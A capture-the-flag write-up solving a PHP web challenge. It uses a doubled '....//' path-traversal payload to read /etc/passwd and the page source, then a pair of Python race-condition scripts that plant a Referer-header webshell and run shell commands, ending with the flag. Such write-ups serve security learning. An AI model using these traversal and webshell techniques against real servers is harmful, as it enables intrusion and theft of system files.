Are we supposed to buy the flag?
First, look at the page source:
<img width="900" height="450" src="data:image/png;base64,/9j/4AAQSkZJRg..."/>
Nothing there.
Now look at the URL:
http://1.14.97.218:21715/index.php?action=read&img=maimaimai.jpg
This looks like an arbitrary file read.
Try reading /etc/passwd:
http://1.14.97.218:21715/index.php?action=read&img=/etc/passwd
<b>Warning</b>: file_get_contents(/var/www/html/img//etc/passwd): failed to open stream: No such file or directory in <b>/var/www/html/index.php</b> on line <b>17</b><br />
<img width="900" height="450" src="data:image/png;base64,"/>
Fortunately the server returns the PHP error message. It shows that when reading the file, the backend prepends the base directory /var/www/html/img/ to the path we supply.
My guess is that ../ is filtered, probably with replace('../', ''), i.e. replaced with an empty string --> double-write bypass:
http://1.14.97.218:21715/index.php?action=read&img=....//....//....//....//....//etc/passwd
This successfully reads /etc/passwd.
Next, try reading the index.php source:
http://1.14.97.218:21715/index.php?action=read&img=....//index.php
The source is:
<?php
$rootpath = '/var/www/html/';
$path = md5("compete" . $_SERVER['HTTP_REFERER']);
$sandbox = $rootpath . $path;
@mkdir($sandbox);
@chdir($sandbox);

function cop($filename)
{
    copy($filename, $filename . "2.php");
    rename($filename . "2.php", $filename);
    echo "copy" . $filename . "success";
}

function read($filename)
{
    $content = base64_encode(file_get_contents($filename));
    echo '<img width="900" height="450" src="data:image/png;base64,' . $content . '"/>';
}

if(isset($_GET['action']) && $_GET['action'] === "copy")
{
    $filename = $sandbox . "/" . $path . ".txt";
    file_put_contents($filename, "compete" . $_SERVER['HTTP_REFERER']);
    cop($filename);
}
else if(isset($_GET['action']) && $_GET['action'] === "read")
{
    if(!isset($_GET['img']))
    {
        $filename = "maimaimai.jpg";
    }
    else {
        $filename = str_replace("../", "", $_GET['img']);
    }
    $filename = $rootpath . "img/" . $filename;
    read($filename);
}
else
{
    header("Location: /index.php?action=read&img=maimaimai.jpg");
}
?>
Besides read, which reads arbitrary files, there is also the copy function. It can be used to write a webshell, but the written file is removed immediately.
Try a race condition to upload the webshell.
Run the following two scripts at the same time:
# script1
import requests

while 1:
    # res = requests.get("http://1.14.97.218:21715/index.php?action=copy", headers={"referer": "<?php system('ls /');?>"})
    res = requests.get("http://1.14.97.218:21715/index.php?action=copy", headers={"referer": "<?php system($_GET[c]);?>"})
    print(res.text)

# script2
import requests

while 1:
    response = requests.get(
        "http://1.14.97.218:21715/b657f026a2471104c7c5c6af5d5dbbfa/b657f026a2471104c7c5c6af5d5dbbfa.txt2.php?c=ls$IFS$9/")
    if response.status_code != 404:
        print(response.text)
Running both at the same time shows that the flag file in the root directory is named fla444444444444g.
So read the flag:
http://1.14.97.218:21715/index.php?action=read&img=....//....//....//....//....//fla444444444444g
# DASCTF{43378609768205435621416258245141}